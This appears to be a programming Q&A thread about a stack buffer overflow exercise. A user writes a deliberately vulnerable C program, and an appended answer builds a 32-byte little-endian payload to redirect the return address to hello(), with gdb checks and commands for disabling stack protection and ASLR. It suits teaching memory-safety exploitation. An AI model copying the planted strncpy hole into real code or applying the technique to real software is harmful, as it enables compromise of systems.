Hi, I’m trying to write an overflow exploit for a simple program that I’ve built. Below is the C program that I’ve written.
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char *string_in = "Did not work";

/* Deliberately vulnerable: copies 24 bytes into a 6-byte stack buffer. */
int test(char *this){
    char sum_buf[6];
    strncpy(sum_buf, this, 24);
    return 0;
}

/* Never called directly; the goal is to land here through the overflow. */
void hello(){
    printf("hello man");
    string_in = "If this triggered, it means our shell code is working\n";
    return;
}

int main(int argc, char **argv){
    test("01234567890123456789\x00\x40\x06\x02");
    printf("My string is %s", string_in);
    return 0;
}
Basically what happens is that the string is supposed to be read in and overwrite EBP with the value 0x00400602, which is the return address of my function hello(). I know that this is the value of the address for my function hello from objdump -d test_stack.o. From the object dump, I can tell that rsp has been advanced 20 bytes, as shown below:
00000000004005b4 <test>:
4005b4: 55 push %rbp
4005b5: 48 89 e5 mov %rsp,%rbp
4005b8: 48 83 ec 20 sub $0x20,%rsp
4005bc: 48 89 7d e8 mov %rdi,-0x18(%rbp)
4005c0: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
4005c7: 00 00
4005c9: 48 89 45 f8 mov %rax,-0x8(%rbp)
4005cd: 31 c0 xor %eax,%eax
4005cf: 48 8b 4d e8 mov -0x18(%rbp),%rcx
4005d3: 48 8d 45 f0 lea -0x10(%rbp),%rax
4005d7: ba 18 00 00 00 mov $0x18,%edx
4005dc: 48 89 ce mov %rcx,%rsi
4005df: 48 89 c7 mov %rax,%rdi
4005e2: e8 a9 fe ff ff callq 400490 <strncpy@plt>
4005e7: b8 00 00 00 00 mov $0x0,%eax
4005ec: 48 8b 55 f8 mov -0x8(%rbp),%rdx
4005f0: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx
4005f7: 00 00
4005f9: 74 05 je 400600 <test+0x4c>
4005fb: e8 a0 fe ff ff callq 4004a0 <__stack_chk_fail@plt>
400600: c9 leaveq
400601: c3 retq
0000000000400602 <hello>:
400602: 55 push %rbp
400603: 48 89 e5 mov %rsp,%rbp
400606: b8 6d 07 40 00 mov $0x40076d,%eax
40060b: 48 89 c7 mov %rax,%rdi
40060e: b8 00 00 00 00 mov $0x0,%eax
400613: e8 98 fe ff ff callq 4004b0 <printf@plt>
400618: 48 c7 05 0d 0a 20 00 movq $0x400778,0x200a0d(%rip) #
Since sub $20,%rsp, I know that I need to write at least 20 bytes … but I’m not sure how much more I need to write to get to my rbp. It’s possible that, because of my callq’s, I need to write 8 or more bytes, since there are 2 x calls. Though I’m really not sure how much I need to write.
I compile my program like so …
gcc -g stack.c -o test_stack.o
execstack -s test_stack.o
Since I’m using Ubuntu 11, my kernel version is something like 3.0.17, so I know that my ASLR is on by default. I may need to turn that off, but I don’t know how to do that. Also, I’m running an i386:x86_64. Can I tell what my stack actually looks like during a run? How can I get this to work, and how do I find out how much I need to write?
Thanks for the help
Well, the first problem was that I had to turn off stack protection with the -fno-stack-protector flag. Once I did that, it became much easier to overwrite my buffer. The second problem was that even though the string was read and stored little-endian, the opcode and operand seemed to be interpreted big-endian. I don’t understand why this is the case. Lastly, it wasn’t the EBP stack frame that I was interested in overwriting … it was the return address of my function. This meant that instead of writing 24 bytes, I needed to effectively overwrite a whopping 32 bytes. I finally got the program to work!
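The question asks how many bytes it takes to reach the return address, and the follow-up settles on 32 bytes and an address that "seemed" big-endian. The program below is an added example, not code from the original post: it reads the frame layout off the objdump in the question (sum_buf at rbp-0x10, saved rbp at rbp+0, return address at rbp+8, canary gone once -fno-stack-protector is used), builds the overflow string with the address of hello() stored least-significant byte first, and runs strncpy against a byte array standing in for the frame to show which copy lengths actually reach the return slot. The hello() address 0x400602 comes from the question; the frame model and the value chosen for the pre-existing return address (0x4006f0) are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout of test(), read from the objdump in the question, once the
 * canary at -0x8(%rbp) is gone (-fno-stack-protector):
 *   lea -0x10(%rbp),%rax   -> sum_buf starts at rbp-16
 *   push %rbp              -> the saved rbp occupies rbp+0 .. rbp+7
 *   callq test             -> the return address occupies rbp+8 .. rbp+15
 */
#define SUM_BUF_OFFSET   16u                      /* sum_buf to saved rbp */
#define RET_SLOT_OFFSET  (SUM_BUF_OFFSET + 8u)    /* sum_buf to return address */
#define FRAME_MODEL_SIZE (RET_SLOT_OFFSET + 8u)   /* sum_buf + saved rbp + return address */

/* Target taken from the question: the first instruction of hello(). */
#define HELLO_ADDR 0x0000000000400602ULL

/* Assumed (made-up) value for whatever return address was on the stack before
 * the copy, so an untouched slot is distinguishable from a successful hit. */
#define ORIGINAL_RET 0x00000000004006f0ULL

/* x86-64 keeps a 64-bit value in memory least-significant byte first, so the
 * address must appear in the string as 02 06 40 00 00 00 00 00, not 00 40 06 02. */
void put_le64(unsigned char *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (unsigned char)(v >> (8 * i));
}

uint64_t get_le64(const unsigned char *src)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)src[i] << (8 * i);
    return v;
}

/* Fill `out` (FRAME_MODEL_SIZE bytes) with filler up to the return slot, then
 * the target address in little-endian order. Returns the copy length needed
 * to overwrite the whole 8-byte return slot. */
size_t build_payload(unsigned char *out, uint64_t target)
{
    memset(out, 'A', RET_SLOT_OFFSET);     /* lands in sum_buf and the saved rbp */
    put_le64(out + RET_SLOT_OFFSET, target);
    return FRAME_MODEL_SIZE;               /* 16 + 8 + 8 = 32 bytes */
}

/* Model strncpy(sum_buf, payload, n) against the frame above and return what
 * ends up in the return-address slot. strncpy stops at the first NUL in the
 * source and pads the remainder of n with NULs; that padding is what delivers
 * the zero high bytes of 0x400602 even though the C string ends at the
 * first \x00 of the address. */
uint64_t simulate_return_slot(const unsigned char *payload, size_t n)
{
    unsigned char frame[FRAME_MODEL_SIZE];
    if (n > sizeof frame)                  /* keep the model itself in bounds */
        n = sizeof frame;
    memset(frame, 0xCC, sizeof frame);     /* stand-in for stale stack contents */
    put_le64(frame + RET_SLOT_OFFSET, ORIGINAL_RET);
    strncpy((char *)frame, (const char *)payload, n);
    return get_le64(frame + RET_SLOT_OFFSET);
}

int main(void)
{
    unsigned char payload[FRAME_MODEL_SIZE];
    size_t need = build_payload(payload, HELLO_ADDR);

    printf("bytes from sum_buf to the return address: %u\n", RET_SLOT_OFFSET);
    printf("bytes needed to overwrite it completely:  %zu\n", need);
    printf("strncpy n=24 leaves ret = 0x%llx (untouched)\n",
           (unsigned long long)simulate_return_slot(payload, 24));
    printf("strncpy n=32 leaves ret = 0x%llx (hello)\n",
           (unsigned long long)simulate_return_slot(payload, 32));
    return 0;
}
```

Two caveats when moving from the model to the real binary. Removing the canary also removes the -0x8(%rbp) slot, so re-read the lea offset from the objdump of the no-canary build before trusting 16; then confirm the layout live in gdb by breaking on the strncpy@plt call, stepping over it with ni, and dumping x/4gx $rbp-0x10, which prints sum_buf, the saved rbp and the return address in that order. For ASLR, setarch x86_64 -R ./test_stack.o runs the program with randomization disabled (or write 0 to /proc/sys/kernel/randomize_va_space as root), but note that this binary is not PIE: hello() sits at 0x400602 either way, only the stack moves, and this payload never needs a stack address.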